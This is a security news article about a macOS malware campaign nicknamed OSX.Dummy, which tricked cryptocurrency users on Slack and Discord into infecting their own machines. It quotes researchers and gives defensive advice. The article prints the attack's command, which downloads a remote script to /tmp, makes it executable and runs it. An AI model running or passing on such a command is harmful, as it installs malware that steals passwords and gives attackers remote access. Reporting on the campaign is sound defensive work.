Cybercriminals target Slack and Discord individuals who debate cryptocurrencies, reported SC Media UK on 2nd July.
According to the blog post, researchers found several MacOS malware attacks that focused specifically on Slack and Discord’s cryptocurrency-related discussions. Hackers interfere with chat groups as administrators or “key people” and then post “small snippets“. After the users follow the instructions, their device gets infected.
As reported by SC Media UK, malware can abduct individual passwords and keep on hackers’ servers. Remco Verhoef assumes that we are talking about a Netherland-based server.
“When the code is installed it attempts to connect to a command and control (C&C) server owned by the attackers. If the connection to the C&C server succeeds, hackers can then remotely access the Mac and run code on it,” reported SC Media UK.
Once you click on the following script: cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script a mach064 binary (34M) document will be downloaded:
Patrick Wardle, Founder and Chief Researcher Officer of Digital Security reported on Friday for Objective-See that “apparently attackers are asking users to infect themselves” with a “rather massive machO binary.” Wardle called the malware “OSX.Dummy” for the following reasons:
- “the infection method is dumb
- the massive size of the binary is dumb
- the persistence mechanism is lame (and thus also dumb)
- the capabilities are rather limited (and thus rather dumb)
- it’s trivial to detect at every step (that dumb)
- …and finally, the malware saves the user’s password to dumpdummy”
Analysts assume that such attacks will advance over time and advise users to use multi-factor authentication in order to join an official chat group.
“We should expect such attacks to improve over time. As for organisations, they have some benefits in that they can typically control their network and environment more tightly than home users. In-house instances of such chat groups therefore can be rigorously checked for membership and the content being shared. Multi-factor authentication should be used to ensure that leaked or stolen credentials do not allow simply anyone to join an organisations chat room,” Alex Hinchliffe, an analyst at Unit 42 explained.